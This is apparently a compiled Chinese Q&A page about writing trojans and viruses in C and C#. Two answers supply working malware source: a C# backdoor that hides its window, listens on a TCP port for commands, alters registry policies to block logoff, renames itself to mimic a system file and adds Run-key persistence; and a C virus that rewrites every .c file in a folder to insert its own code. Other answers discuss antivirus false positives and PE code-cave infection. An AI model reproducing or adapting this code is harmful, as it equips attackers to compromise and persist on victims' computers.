c編程木馬
『壹』 用c語言編寫蠕蟲、木馬哪個更簡單
蠕蟲更加簡單,因為蠕蟲小,只有傳播的一些功能,比起木馬復雜度小很多。
『貳』 每次調試C語言程序,都會有特洛伊木馬怎麼辦
對你的編程軟體查毒,如果有毒,那麼換軟體
如果無毒,那麼很可能是誤報,選擇開發者模式,對於輸出目錄進行放過
或者每次點一下放過就好
『叄』 用VC6.0編寫C語言在編譯後出現發現木馬,要清除
不管他,直接放行!
殺毒軟體的機理是維護系統底層不受侵害,而很多時候我們開發程序是會調用底層的介面等等,所以殺毒軟體會攔截!
希望可以幫到你!
『肆』 c語言可以編個木馬嗎
要實現木馬服務的程序,主要實現以下幾個功能:後台的運行(隱藏技術),控制碼的接收與注冊表的修改,下面對這三方面做介紹:
1、在VC#中,建立一個後台服務程序是很容易的,先建立一個新的C#的Windows應用程序,項目名稱自定(不過為了隱藏可使用與系統相近的名稱),將窗體屬性「ShowInTaskbar」屬性設為false,讓它運行時不會在任務欄中顯示,並將屬性「Windowstate」屬性設為Mininized即可,這樣窗體就可以隱藏運行了。當然你也可以在InitializeComponent()設置,此函數起初始化的作用,在窗體顯示前運行,代碼如下:
private void InitializeComponent()
{
//
// Form1
//
//窗體顯示的起點和大小
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(368, 357);
//窗體名稱
this.Name = "Form1";
//設置屬性讓它後台運行
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}
2、控制代碼的接收,必需在服務程序運行開始就啟動,所以偵聽線程必需在程序初始化中啟動,所以放在窗體的構造函數中,代碼註解如下:
public Form1() //窗體的構造函數
{
//
// Windows 窗體設計器支持所必需的
//
InitializeComponent();
//
// TODO: 在 InitializeComponent 調用後添加任何構造函數代碼
//加入你的偵聽代碼
//埠你可以自已設定,我使用了固定的埠
int port =6678;
//System.Net.Sockets.TcpListener是用來在Tcp網路中偵聽客戶端的
listener = new TcpListener(port);
//啟動偵聽
listener.Start();
//增加接收控制碼的線程,如果要停止線程可以用 Thread.abort()
//reControlCode 是線程啟動執行的函數,此函數根據接收的控制
//控制碼選取合適的注冊表修改函數
Thread thread = new Thread(new ThreadStart(reControlCode));
thread.Start();
}
reControlCode函數如下,完整代碼見程序
private void reControlCode()
{
//設置接收套接字,接收listener.AcceptSocket是返回已經接收的客戶的請求
socket = listener.AcceptSocket();
//如果連接成功執行
while (socket.Connected)
{
//接收控制碼
byte [] by =new byte[6];
int i = socket.Receive(by,by.Length ,0);
string ss = System.Text.Encoding.ASCII.GetString(by);
//根據控制碼執行不同的功能
//修改注冊表加入編碼
switch (ss)
{
case "jiance"://測試連接,返回測試信息
string str ="hjc";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);
socket.Send(bytee,0,bytee.Length,0);
break;
case "zx1000":
//修改注冊表函數,自已定義,見下面分析
UnLogOff();
//返回控制消息
retMessage();
break;
case "zx0100":
//修改注冊表函數
UnClose();
//返回控制消息
retMessage();
break;
//重復的case功能與前面一樣,略掉
default:
break;
}//case
}//while
} //private void reControlCode
3、C#中實現注冊表的修改,使用了.NET類庫中的System.Microsoft.Win32命令空間,它提供兩種類型的類:處理由操作系統引發的事件的類和對系統注冊表進行操作的類。下面就可以看到它的用法。這里我做了一個修改注冊表的子程序:使計算機不能注銷。在這之前先了解注冊表,在子鍵SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
下面設鍵值NoLogOff 為 1 即可使計算機無法注銷。在下面的函數中用C#實現對注冊表的修改:
private void UnLogOff()
{
//得到主機的注冊表的頂級節點
Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
//設置一個注冊表子鍵的變數
RegistryKey key1;
try
{
//函數RegistryKey.OpenSubkey(string registrykey,bool canwrite)檢索指定的子鍵
//registrykey是用戶指定的鍵值,canwrite 為true則可修改,默認為fasle不可改
key1 =
rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
//設置子鍵的鍵名,和值
key1.SetValue ("NoLogOff",1);
//關閉打開的子鍵
key1.Close();
//警告字元串設定
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer鍵值Nologoff被修改!請將它置為0!";
}
catch{}
//如果不存在自已建立
if(key1 ==null)
{
try
{
//使用RegistryKey.CreateSubKey(string mystring)函數來建立你需要的子鍵
RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer鍵值Nologoff被修改!請將它置為0!";
}
catch{}
}
}
4、在木馬程序中還有一個重要的功能就是自我的復制和轉移。木馬引入被控制的主機時必需自動將木馬隱藏在System,System32的目錄下以防被發現。轉移的代碼分析如下,主要實現的功能是將D盤下的木馬程序轉移到C:\\winnnt\\system\\msdoss.exe,同時換名稱。使用的.NET命名空間System.IO,它的作用是允許對數據流和文件進行同步和非同步讀寫。這里我們使用了System.IO.File類。
private void moveCC1()
{
try
{
//函數File.Move(string sourceFileName,string destFileName)起移動文件的作用
//sourceFileName為要移動的文件名,destFileName為文件的新路徑
File.Move("C:\\winnnt\\system\\msdoss.exe","d:\\winnt\\system32\\expleror.exe");
}
catch {}
//將新移的木馬程序設為自啟動.分析和前面一樣
try
{
key1 = rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
if(key1 ==null)
{
try
{
RegistryKey key2=rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
}
} //moveCC1()
按照步驟來就可以得到一個C#木馬了..
都給出答案了.可以給分卜?
『伍』 c語言源文件編譯後成了木馬,求解
代碼沒有大問題
#include<stdio.h>
#include<stdlib.h>
intmain(void)
{
inta[10],i;
for(i=0;i<10;i++)
scanf("%d",&a[i]);
for(i=0;i<10;i++)
printf("%d ",a[i]);
system("pause");
return0;//因為intmain(),所以要有個返回值
}
估計你所說的木馬是你系統帶的殺毒軟體誤報的! 你程序的文件名最好寫個略有復雜性的名稱,如:test_20140831.c
『陸』 c語言木馬代碼,簡單點的,我保證不做違法的
#include <stdio.h>
#include <dir.h>
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i>=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#include<stdio.h>\n",out);
fputs("#include<dir.h>\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;j<i-1;j++)
if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);
fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}
再就是網上一網路一大堆的。
『柒』 c語言木馬源代碼
ls這個好像是感染c文件的病毒,自動加上玩笑代碼(當然可以是惡意的)
不是木馬
『捌』 請介紹下C語言寫木馬的演算法......
我只知道window的木馬程序的原理,首先你要去研究一下windows PE文件的格式,windows PE文件包括(exe dll文件等),用文本方式打開任意一個exe或者dll文件,就會發現這些文件都具有類似的組織結構(就是PE格式)
仔細耐心地研究了PE格式後,你會發現這些PE格式的文件有很多間隙空間可用,window木馬程序正是利用PE格式文件中的這些間隙,把自己的代碼插入這些間隙空間中,同時還要修改宿主程序的入口地址(OEP Original Entry Point)
這樣,宿主程序一運行,首先運行生成木馬的代碼,然後運行宿主程序。
Windows應用程序捆綁核心編程 (PE)
http://book.csdn.net/bookfiles/212/10021210198.shtml
http://www.diybl.com/course/3_program/c++/cppjs/2008219/100330.html
『玖』 如何用C語言製作木馬
這個一兩句也說不清楚 你首先要有信心去學習c語言,c語言不像vb,要到後期才能看到它的威力,所以要堅持的學下去 希望你能堅持住,教程網上隨便一搜索就有了,還有可以去買書 都可以 總之要有耐心 堅持!!
『拾』 c語言寫木馬程序原理
原理有很多種,目地就是破壞計算機環境,比如有大量消耗cpu,刪除更改你的文件使它失效,紀錄你的鍵盤使用情況,達到一個竊取你密碼和賬號的的結果,是你在某些網站的內容被其任意篡改,或者讓你就算無法正常工作,只要能達到某種破壞你的影響你的計算機的使用,都可以算是病毒。
舉個簡單的例子,你寫的一個程序改變了計算機的時間,比如改成1900年,這個時候很多程序都不能運行,再就是一個病毒的效果,你在用一個死循環消耗cpu,這個時候用戶的機子就比較卡,所以也是一個病毒,當然這些都是簡單例子,如果要深入學習,僅知道這點點只能當作啟蒙